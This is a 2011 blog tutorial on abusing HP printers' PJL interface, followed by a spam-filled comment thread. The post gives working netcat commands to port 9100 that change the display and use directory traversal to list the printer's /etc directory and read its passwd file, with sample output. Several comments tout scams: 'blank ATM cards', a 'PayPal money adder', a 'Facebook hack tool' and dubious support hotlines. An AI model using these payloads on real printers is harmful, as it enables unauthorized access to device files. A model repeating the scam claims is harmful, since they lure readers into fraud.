Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write up is about knowing and understanding the basics. A long time ago, you became a “hacker” because you were someone who was an expert in a subject.
I know people that have forgotten more about VMS than I could ever learn. They became known as a VMS “hacker” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about and being able to manipulate those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate, since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve not doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has, since, officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PC’s, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested (later in this article), showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain).
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • Telnet
  • SNMP
  • PCL / PJL
HTTP and HTTPS, is served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. Ok, maybe not most, but those that have an understanding about security know that HTTPS is better than HTTP, so they usually turn off communications on Port 80, in favor of Port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the password is usually the same using Telnet, as it is using EWS. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later.).

But what’s interesting is PJL – the Printer Job Language – an extension of PCL (the Printer Command Language – how print jobs are communicated to printers) is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, supports the ability to password protect it (with a separate password from EWS/Telnet) so you can actually protect the printing stream (a little). The following examples, however, were successfully implemented on an HP printer without PJL password being set. But, let’s face facts, nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character. I highly suggest you use Notepad++ in order to craft the ASCII commands. Regular Notepad just won’t cut it.  And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). This will send the commands in a “raw”, unadulterated way so the printer will interpret the commands correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” do that is:

[ESC]%-12345X @PJL RDYMSG DISPLAY="Igor!!!!"

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to perform the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading:

Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t?) we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247

Using the PJL commands to interact with the Filesystem is not a hack, it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23

Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with the printers. If you want to learn more about PJL commainds, go ahead and google “PJL reference manual”, you’ll get a number of hits listing out PDF’s containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion and your expert knowledge in this subject should help you educate others who may not quite understand the claims that are being made regarding the vulnerability of HP Printers.


    Rajhans Enterprises, India’s first leading & largest Offset and Commercial Web Offset Printers in Bangalore State of Karnataka and have branches at Madurai, Coimbatore and Davangere.


    For more details visit :-

  2. Hi
    Kind of fun... I'm also in the middle of hacking a few HP printers.. actually on request to do so...
    Question: Can the FSDIRLIST be disabled in any way ??
    Reason being that although wanting to do just the listing of all the macros.. I do not get any output at all.. nor the listing of the "O:\pcl\macros" that I would like to...
    Any help is appreciated!

    1. According to this: there's no discussion regarding disabling the FSDIRLIST command. But enabling passwords for PJL will make it so you can't submit a PJL job with FSDIRLIST and have it execute (without the password). Any jobs submitted without the correct PJL password will look like they are working and then do absolutely nothing. It sounds to me that the target may have PJL passwords enabled. The behavior you describe sounds like it's protected that way.

    2. Hi
      COmmand is like this:
      @PJL COMMENT XRXbegin
      @PJL FSMKDIR NAME="0:\pcl\macros"
      @PJL FSDOWNLOAD FORMAT:BINARY NAME="0:\pcl\macros\15" SIZE=19800
      which works well for the download of macros.. but doing a FSDIRLIST on the same directory.... gives no output whatsoever!!
      I am really baffled by this....
      ideas will be appreciated!
      (Needless to say the FSDIRLIST is to make certain that the needed macros have been downloaded and to verify the download)


      Am Mark Oscar,I want to testify about Jack Robert blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no hope then I saw so many testimony about how Jack Robert send them the ATM blank card and use it to collect money in any ATM machine and become rich. I also email him and he sent me the blank card. I have use it to get 70,000 dollars. withdraw the maximum of $5,000 daily. Jack Robert is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email Him on how to get it now via: or call/Text on +1(406) 350-4986

  3. Sre Travels maintains large fleet super deluxe comfortable buses that are well equipped with exotic amenities with various combinations of deals that mostly offer reasonable fares and exclusive services. Bus Ticket for several multiple routes are always possible with Sre Travels. Online Bus Booking for this Travels is available with For discounts and offers visit this page.

  4. This comment has been removed by the author.

  5. why not buy my ticket to your funeral for trying to sell tickets...

  6. Here's how you do that one, without downloading anything... Just paste into a command line, replacing "Printer IP" with your printer's IP.

    Note:Type in all caps.


    Telnet Printer IP 9100




  7. Do you know a hack for HP printers' region code locking? I have an HP PSC 1300 series lying wasted with me since 4 years because it was purchased in Europe and Indian cartridges don't work on it. I also have 4 brand new colour and black cartridges lying waste which I purchased hurriedly out here. Would really appreciate the help. Thanks in advance!

  8. The offset printers in India are paramount for the promotion and growth of the business organization. You can design customized logos for your business with the aid of offset printing.

  9. This the Good Hacking Techniques.. Thanks For sharing this Information...

    Wedding Websites

  10. So, how do you secure a printer against PJL/Telnet hacks? I set an admin passwd, disabled telnet, and added a PJL password#. Still, I can change the display via telnet. HP P3015.

  11. hi Drew,
    i tried the following command on one of our HP Laserjet printer which i confirmed without pjl password enabled. I did not get any response back and finally i had to use CTRL-C to quit.

    type cplock.pjl | nc -v -v 9100
    where cplock.pjl's content is as follows (i used ALT 027 to insert [esc])
    [ESC]%-12345X@PJL JOB
    @PJL EOJ

  12. This is Awesome Wonderful information.. i am impressing to Read this post..

  13. Great Technique. Awesome Thanks for sharing this Tips..

  14. This blog is very unique i must appreciate you and i want to ask any body here know about the best Toner Cartridge for Printers if i am using Epson branded printer any unique idea appreciated.

  15. wooooooow i can't believe that..i Bryan L. Knight can hack $72.000 in my paypal account..this is really free money guyz...guyz this is really working...thank you so much for this working fine.......thank you
    that is why i am shearing with you.
    Paypal Money Adder
    Paypal Money Generate
    Paypal Money Hack
    Paypal Account Hack


  16. Facebook Hack Tool Free Download
    This is really working...thank you so much for this working fine.......thank you
    That is why i am shearing with you.
    facebook hacker download
    facebook password hacker
    download facebook hacker
    facebook account hacker

  17. @Admin

    Can You please guide me how i can install my HP 5000 Printer driver? Where can i download it?


  18. I am not sure about the idea of hacking a printer on how it helps consumers. All i want it to get cheap printer ink for my every day print usage.

  19. I have been reading your posts regularly. I need to say that you are doing a fantastic job. Please keep up the great work.

    HP Deskjet 3633 Printer Support

  20. Hi... i like your post thank you for sharing and if you face any yahoo mail related issues you can contact yahoo customer care number.

  21. Great blog! I really love how it is easy on my eyes and the information are well written.

    123HPEnvy OfficeJet5745 Setup

  22. Does anybody know if there is another way to send PJL code to a printer without using NetCat? I would like to try to avoid using NetCat as it appears... sketchy. I have tried using the FTP interface already, but no luck. Any help would be greatly appreciated, as I have been trying to resolve this for days!


  23. I have been reading your posts regularly. I need to say that you are doing a fantastic job. Please keep up the great work.

    123HP officejet-pro 476dw Printer Setup

  24. Nice Post, For HP Support Toll Free Number 0800-098-8579, We provide you online help and support.Call us at Our HP Printer Support Helpline Number


  25. This comment has been removed by a blog administrator

    123 HP envy5642

  26. Very helpful Post!!! This is the first time I have read a post like this. Find Career tips here.

    123 HP LJ M521 Setup - m521

  27. Thank you for sharing this information and Very good looking blog on

    123 hp oj5745 setup

  28. Get HP printer error solution at one destination just make a call HP Printer Support Helpline Number -1-800-436-0509 , hp printer support in UK, US and AUS 24*7, hp printer setup issues, error solving over the phone.

    helpline number +1-855-517-2433(TollFree)

  30. Thanks for sharing your valuable tips among us..

  31. contact canon printer support yo get instant solutions for your canon printer - installing printer, driver problem or many other issues which you are facing...

  32. To get hassle-free AT&T email support services from a third party tech support providing company, you need to simply dial at&t toll free customer support number. The phone number is a right choice for getting trouble-free at&t tech support. So you can dial this number and get the needed help for your account-related concerns.att email helpline number

  33. Really awesome blog. Your blog is really useful for me. Thanks for sharing this informative blog. Keep update your blog.

    123 HP Ojp8710

  34. Hi this is very nice post .this is a so important information for everyone .we are providing canon printer technical support for canon product as well as each printers support on toll-free number +1-800-723-4210. Thank you.

  35. very nice blog.thanks for doing this great job and I wish you will continue like this . this is a so important information for everyone .we are providing canon printer technical support for canon product as well as each printers support on toll-free number +1-800-723-4210. Thank you.

  36. Hey, nice site you have here! Keep up the excellent work!

    HP OJPRO8710 Setup

  37. The technique and the article you shared here is really amazing I never know this before but now I can try this. Thank you for sharing this article.

    123 hp support

  38. It would not be an exaggeration to say that the manufacturing market would certainly do not have innovativeness and performance without the existence of a 3D printing device. 3d printer

  39. Wow! That's really great information guys.I know lot of new things here. Really great contribution.Thank you .
    123 HP Officejet Pro 8710

  40. Contact QuickBooks Technical Support Number of at toll free number 1-844-640-1482 and resolve all your software issues in limited time period.

  41. If you are looking of quickbooks support number then you can dial our toll free number at 1844-857-4845.

  42. It provides a big collection of useful information. If you want online repair service for printers, plotters, scanner so VISIT HERE.

  43. Nice blog...
    HP Printer Tech Support Number is available for serve the all required solution for HP Computer, laptops, and printers etc. Dial our toll free number 1-800-723-4210 and our qualified technicians will solve your every issues related to HP.

    HP Tech Support Number

  44. Awesome blog! I am really impressed by this blog! The pictures are really nice and cool
    Norton Antivirus Setup

  45. Wonderful blog & good post.Its really helpful for me, awaiting for more new post. Keep Blogging!

    123 hp printer setup

  46. Well, your blog is very informative, thank you for posting such useful blog as it is very accurate. But i have another website with much better detail than this you must Post Free Ads.

  47. its pretty good...

  48. Hey, that’s really a good post on pets for sale in Delhi, i really like your blog as the information is very useful if you are a pet lover. Well, there is one more site for the same service you should check it for more detail.

  49. Thanks for give me this information about Hp pinter support really this product is very effective.

  50. Nice Article you have shared a great information and i have been following your blog regularly. If you need any technical assistance please visit our website by clicking on it Free Technical Support for HP Printers

  51. Nice information thanks for sharing it..!it will be helpful for people searching this kind of information..

    123 HP Officejet Pro 8660 Setup

  52. A very interesting article. The insights are really helpful and informative. Thanks for posting.

    123 HP Officejet Pro 8660 Wireless Install Setup

  53. Wonderful blog & good post.Its really helpful for me, awaiting for more new post. Keep Blogging!

    123 HP Officejet Pro 8710 Printer Setup

  54. Nice Blog
    HP Technical Support
    Get instant service to, HP Technical support, provide the best quality service.

  55. ThankYou, For sharing such a valuable post. 1800-(244)-9314

  56. Excellent information.I like the way of writing and presenting.
    HP Envy 5642 Printer Installation Support

  57. Looking great work, I really appreciated to you on this quality work. Nice post!! these tips may help me for future.

  58. Enjoyed reading the article above , really explains everything in detail,the article is very interesting and effective.Thank you and good luck for the upcoming articles Officejet 3832

  59. Thank you very much for your tips, sure i will follow your tips.

    123 hp setup

  60. Microsoft office has a different version, and the entire version has the different setup file set up . Some of the version is Office 2013, Office 2016 and Office 365 etc. Go to and redeem your are multiple manufacturers making printers for home and office use with varied range as printer series per the need and affordability of different customers. It has become one of the most useful computer hardware devices that allow people to convert computer generated typescript into a physical printed document. Norton is one of the most reliable antivirus providers in the market. Norton is delivering top rated protection from mobile devices and computers. Norton has 3 antivirus packages McAfee have the complete set of features which can protect your digital online and offline life of the computing devices, and it not only help you to protect it install mcafee.

  61. We are a third party technical support service. Avast Customer Support is here to help you out with the whole procedure to Download Avast Antivirus online, We not only fix your Avast Support related issues but will guide with how to get started with your new Avast product once it gets installed successfully.We at Avast Tech Support provides service to protect your PC from potential online threats and external attacks like viruses, Trojans, malwares, spywares and phishing scams. And Avast Refund. Call on our Avast Phone Number.

    Gmail Customer service is a third party technical support service for Gmail users when they face any technical issue or error in their Gmail account. Our Gmail Customer Support team solves issues like forgot Gmail account password, Gmail configuration or Sync issues, recover deleted emails and many more.

    How you install or reinstall Office 365 or Office 2016 depends on whether your Office product is part of an Office for home or Office for business plan. If you're not sure what you have, see what office com setup products are included in each plan and then follow the steps for your product. The steps below also apply if you're installing a single, stand-alone Office application such as Access 2016 or Visio 2016. Need Help with office setup Enter Product Key?

    Norton Tech Support is a third party service provider and not in any way associated with Norton or any of its partner companies. At Norton Support we offer support for Norton products and sell subscription based additional warranty on computer and other peripheral devices.


  62. I am really impressed along with your writing skills and also with the format on your blog.

    123 HP Setup Envy 5540

  63. Very interesting,good job and thanks for sharing such a good

    blog.your article is so convincing that I never stop myself to say

    something about it.You’re doing a great job.Keep it up.

    123 hp setup